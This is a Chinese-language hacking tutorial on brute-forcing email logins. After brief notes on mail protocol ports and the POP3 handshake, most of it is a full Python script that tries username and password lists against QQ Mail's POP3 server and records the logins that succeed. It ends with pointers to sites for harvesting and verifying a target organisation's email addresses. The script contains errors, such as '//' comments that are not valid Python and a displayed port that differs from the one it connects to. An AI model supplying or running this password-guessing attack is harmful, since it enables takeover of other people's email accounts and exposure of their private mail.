爆破邮箱有俩种姿势:
一是对网页版的邮箱登录处进行爆破
二是对邮箱的端口号进行爆破
SMTP默认端口是25 ,SSL加密端口是 465
POP3默认端口是110,SSL加密端口是 995
IMAP默认端口是143,SSL加密端口是 993
其中电子邮件的发送协议是SMTP, 邮件的接收协议是IMAP和POP3
其中POP3协议,当客户机与服务器建立联系时,一旦客户机提供了自己身份并成功确认,即由认可状态转入处理状态,在完成相应的操作后客户机发出QUIT命令,则进入更新状态,更新之后最后重返认可状态。
等待连接→身份确认→QUIT命令→认可→处理→更新→已处于认可状态
POP3协议并不复杂,它也是采用的一问一答式的方式,你向服务器发送一个命令,服务器必然会回复一个信息。
QQ邮箱开启POP3协议
邮箱登录生成授权码,不是QQ密码噢
SMTP和POP3协议SSL加密传输端口号
Python爆破邮箱登录授权码
import threading, time, random, sys, poplib
from copy import copy
if len(sys.argv) !=3:
print "\n\t EmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "\t Usage: ./qmailpopbrute.py <userlist> <wordlist>\n"
sys.exit(1)
server = "pop.qq.com"
success = []
try:
users = open(sys.argv[1], "r").readlines()
except(IOError):
print "[-] Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
try:
pop = poplib.POP3(server,110)
welcome = pop.getwelcome()
print welcome
pop.quit()
except (poplib.error_proto):
welcome = "No Response"
pass
def mailbruteforce(listuser,listpwd):
if len(listuser) < 1 or len(listpwd) < 1 :
print "An error occurred: No user or pass list"
return 1
for user in listuser:
for value in listpwd :
user = user.replace("\n","")
value = value.replace("\n","")
try:
print "-"*12
print "[+] User:",user,"Password:",value
time.sleep(2)
pop = poplib.POP3(server,110) //连接pop3服务器端口
pop.user(user) //设置用户名
auth = pop.pass_(value) //设置密码
print auth
if auth.split(' ')[0]!= "+OK" : //判断是否为OK
pop.quit()
print "unknown error !"
continue
if pop.stat()[1] is None or pop.stat()[1] < 1 :
pop.quit()
print "unknown error !"
continue
#print "\t\t\n\nLogin successful:",user, value
#print "\t\tMail:",pop.stat()[0],"emails"
#print "\t\tSize:",pop.stat()[1],"bytes\n\n"
ret = (user,value,pop.stat()[0],pop.stat()[1])
success.append(ret)
#print len(success)
pop.quit()
break
except:
#print "An error occurred:", msg
pass
print "\n\t EmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "[+] Server:",server
print "[+] Port: 995"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"
mailbruteforce(users,words)
print "\t[+] have weakpass :\t",len(success)
if len(success) >=1:
for ret in success:
print "\n\n[+] Login successful:",ret[0], ret[1]
print "\t[+] Mail:",ret[2],"emails"
print "\t[+] Size:",ret[3],"bytes\n"
print "\n[-] Done"
使用:Python hacker.py user.txt passwd.txt
爆破完成
https://hunter.io/
https://www.email-format.com/i/search/
这俩个网站只要输入目标域名,就可以从互联网上搜到对应格式的邮箱账号
收集到邮箱账号后,我们还需要对邮箱账号的可用性进行检测。因为有些邮箱账号很有可能已经弃用了
https://github.com/Tzeross/verifyemail